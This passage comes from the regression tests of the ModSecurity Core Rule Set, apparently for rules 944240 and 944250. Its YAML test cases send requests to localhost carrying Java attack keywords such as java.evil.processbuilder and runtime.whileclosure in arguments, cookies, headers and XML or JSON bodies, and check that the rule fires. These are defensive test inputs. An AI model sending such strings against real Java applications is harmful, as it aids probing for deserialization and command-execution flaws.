"HTTP/1.0" data: "runtime.prototypeclonefactory=test" output: log_contains: "id \"944240\"" - test_title: 944240-57 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-58 desc: "Cookie name includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.prototypeclonefactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-59 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.prototypeclonefactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-60 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-61 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.prototypeclonefactory" output: log_contains: "id \"944240\"" - test_title: 944240-62 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.prototypeclonefactory" output: log_contains: "id \"944240\"" - test_title: 944240-63 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.prototypeclonefactory" output: log_contains: "id \"944240\"" - test_title: 944240-64 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.prototypeclonefactory\"}" output: log_contains: "id \"944240\"" - test_title: 944240-65 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.prototypeclonefactory\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-66 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.prototypeserializationfactory" output: log_contains: "id \"944240\"" - test_title: 944240-67 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.prototypeserializationfactory=test" output: log_contains: "id \"944240\"" - test_title: 944240-68 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.prototypeserializationfactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-69 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.prototypeserializationfactory=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-70 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.prototypeserializationfactory method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-71 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-72 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.prototypeserializationfactory" output: log_contains: "id \"944240\"" - test_title: 944240-73 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.prototypeserializationfactory" output: log_contains: "id \"944240\"" - test_title: 944240-74 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.prototypeserializationfactory" output: log_contains: "id \"944240\"" - test_title: 944240-75 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.prototypeserializationfactory\"}" output: log_contains: "id \"944240\"" - test_title: 944240-76 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.prototypeserializationfactory\": \"test\"}" output: log_contains: "id \"944240\"" - test_title: 944240-77 desc: "Argument test includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=runtime.whileclosure" output: log_contains: "id \"944240\"" - test_title: 944240-78 desc: "Argument name includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "runtime.whileclosure=test" output: log_contains: "id \"944240\"" - test_title: 944240-79 desc: "Cookie test includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=runtime.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-80 desc: "Cookie name includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: runtime.whileclosure=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-81 desc: "Request header test includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: runtime.whileclosure method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944240\"" - test_title: 944240-82 desc: "XML attribute value includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944240\"" - test_title: 944240-83 desc: "XML element value includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.whileclosure" output: log_contains: "id \"944240\"" - test_title: 944240-84 desc: "Nested XML element value includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "runtime.whileclosure" output: log_contains: "id \"944240\"" - test_title: 944240-85 desc: "Content-Type text/plain includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=runtime.whileclosure" output: log_contains: "id \"944240\"" - test_title: 944240-86 desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"runtime.whileclosure\"}" output: log_contains: "id \"944240\"" - test_title: 944240-87 desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"runtime.whileclosure\": \"test\"}" output: log_contains: "id \"944240\"" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml��������0000664�0000000�0000000�00000044212�14461225151�0027674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944250.yaml" description: "Positive tests for rule 944250" tests: - test_title: 944250-0 desc: "Argument test includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-1 desc: "Argument name includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.evil.runtime=test" output: log_contains: "id \"944250\"" - test_title: 944250-2 desc: "Cookie test includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.evil.runtime method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-3 desc: "Cookie name includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.evil.runtime=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-4 desc: "Request header test includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.evil.runtime method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-5 desc: "XML attribute value includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944250\"" - test_title: 944250-6 desc: "XML element value includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-7 desc: "Nested XML element value includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-8 desc: "Content-Type text/plain includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=java.evil.runtime" output: log_contains: "id \"944250\"" - test_title: 944250-9 desc: "Content-Type application/json arg value includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"java.evil.runtime\"}" output: log_contains: "id \"944250\"" - test_title: 944250-10 desc: "Content-Type application/json arg name includes keyword java.evil.runtime" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"java.evil.runtime\": \"test\"}" output: log_contains: "id \"944250\"" - test_title: 944250-11 desc: "Argument test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=java.evil.processbuilder" output: log_contains: "id \"944250\"" - test_title: 944250-12 desc: "Argument name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "java.evil.processbuilder=test" output: log_contains: "id \"944250\"" - test_title: 944250-13 desc: "Cookie test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=java.evil.processbuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-14 desc: "Cookie name includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: java.evil.processbuilder=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-15 desc: "Request header test includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: java.evil.processbuilder method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944250\"" - test_title: 944250-16 desc: "XML attribute value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944250\"" - test_title: 944250-17 desc: "XML element value includes keyword java.evil.processbuilder" stages: - stage: input: dest_addr: 